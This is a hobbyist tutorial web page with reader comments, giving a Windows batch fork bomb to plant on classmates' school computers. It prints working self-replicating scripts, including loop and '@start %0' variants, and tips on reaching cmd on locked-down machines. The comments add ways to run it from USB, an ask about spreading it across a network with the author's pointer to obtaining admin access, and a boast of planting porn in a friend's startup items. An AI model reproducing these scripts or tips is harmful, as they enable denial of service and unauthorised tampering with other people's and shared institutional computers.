fork bomb improved for school server computers: see last step for home use

 by jobergy
3591860560_4b3f72fba4.jpg
This batch file [.bat] is a fork bomb aka rabbit virus. It does not do any damage to a computer but is fun to put on a friend or foes computer at school...

It continuously opens a program you choose, my version opens cmd and itself more than 8 times each time it opens one! so think of it this way, the cmd will open up once, then 8 times, and then those 8 will open up 8 times, and so on... but in matter of seconds. if you leave it running long enough it will crash the computer but most just shut the computer off manually [pushing the power button].

THIS WILL NOT GO ON SERVER ITSELF!!! JUST THE USERS FILE ON THE SERVER! But it still will crash the users computer.

Or there is an easier way i have just learned, but can be cancelled if some one knows what they are doing:

:LOOP
start
GOTO LOOP

Save it as:   [any name u want].bat

I have just recently learned that for some reason [dont know why i didnt put coding there] that this program does not allow the user to log off or turn off computer by clicking start, also it gets worse every time the box shows up saying something like " cant do this application any more, press ok to terminate." as soon as the user hits ok or the x to exit it it will make more and there is so many of those warning boxes that it seems to not be working....Muwahahaha!!
 
Remove these adsRemove these ads by Signing Up

Step 1: Open up notepad

Ok well the embedded video on my instructable isnt working so here is the html code for the video i wanted to show:

http://www.youtube.com/watch?v=9PWF2BU0WNs&feature=related


The video is not mine, but shows a good example of what a fork bomb can do. Although my fork bomb is faster   :P


On a school server  notepad might be harder to find than just looking for all programs.  I did this whole thing at school so i will tell you how i did it. I first opened up [my computer] then opened up the C drive.
You can't access most of the stuff in here unless you're an admin, however you can use the search tool on the side bar! Search the local C drive and search for command prompt.  

Once you open up cmd [command prompt] you just type in notepad and hit enter and walah! you have notepad!
MyNameXsh says: Aug 8, 2012. 1:00 PM
Put it on a USB, if you open it from the usb you can stop it by pulling ut the usb. or you can drag it to the desktop and open it pull out the usb and crash their computer.
will421 says: Apr 9, 2012. 7:09 PM
I did this with an ahk script which would also overwrite ram, therefore breaking EVERYTHING. MUAHAHA!
So far:
Disables Start Menu
Wantonly breaks startup till you attempt to shutdown.
Errors, errors everywhere.
Lag.
Super_Nerd says: Jul 13, 2011. 8:31 AM
Very well written instructable. Is there a way to make this run on every computer on the network when one person runs it?
jobergy (author) in reply to Super_NerdJul 15, 2011. 11:15 AM
... well With computers if you have the knowledge you can pretty much do whatever you please... I however do not haha. But if I were to take a jab at pointing you in the right direction then I would say look into installing something to the network server either remotely or directly. A possibility is to modify a networks VLC program to your liking. I do not believe you can make a "user's" program to access all of the other user's accounts with out some pretty damn complex coding. But if you either A) made an admin, B) found an Admin's account or C) installed this modified VLC or other program to an admin's computer then I believe very much you could get the result you please.

As I explained in the instructable I am not a software developer, coder or what-have-you. Just an ordinary person who "Google'd" most of the information learned . haha.
Super_Nerd in reply to jobergyJul 16, 2011. 11:42 AM
lol! I learned almost all i know about vbscript and batch from instructables!
jobergy (author) in reply to Super_NerdJul 19, 2011. 11:15 AM
Ya this site is amazing for anyone who is somewhat computer & tech savvy and wants to go either more in depth or just to mess around. Right now im starting to dive into the Adruino portion of it, for i am taking a class and will be using it for projects.    0u0
Super_Nerd in reply to jobergyJul 19, 2011. 5:04 PM
I still remember how i found instructables. I googled vbs commands, and ended up with batch commands. Then I forgot about instructables, but then I came back and have been here since.
michaelb958 says: Apr 18, 2011. 1:41 AM
Every time I see one of those batch files, I die a little inside. Try this:

@for /L %%i in (1,1,8) do @start %0

Much simpler. Or even this might do the job:

@start %0
@start %0
@start %0
@start %0
@start %0
@start %0
@start %0
@start %0
jobergy (author) in reply to michaelb958May 5, 2011. 9:48 AM
Ya I love the responses that people get when they see this horror upon their screen lol. I made one for Mac too.

Does this one reopen itself? I have tried very simple fork bombs similar to the one you posted and they went straight to the first one, closed it and the whole process stopped, so that is why I made this one. Yes it is unnecessary for the non-tech savvy but for those who are more so they know how to shut down a simple batch file.
jobergy (author) in reply to michaelb958Apr 18, 2011. 1:34 PM
However I am not a command line expert so if yours opens itself also then yours is better ;)
jobergy (author) in reply to michaelb958Apr 18, 2011. 1:33 PM
is this a loop effect? Because yes this maybe simpler but mine re opens itself that way it can not be cancelled if the user finds the original.

The Batch opens CMD AND itself, that way if they find the first batch file prompt they can cancel that one but it will still continue do to the rest of them.

So yes you are correct that is easier. This one opens itself including whichever other programs you would like to open, I made one once that opened a bunch of midget porn on a friends computer and had it run on his startup items lol. he was SUPER PISSED! I told him he should stop downloading porn haha but eventually i fixed it for him.

Pro

Get More Out of Instructables

Already have an Account?

close

PDF Downloads
As a Pro member, you will gain access to download any Instructable in the PDF format. You also have the ability to customize your PDF download.

Upgrade to Pro today!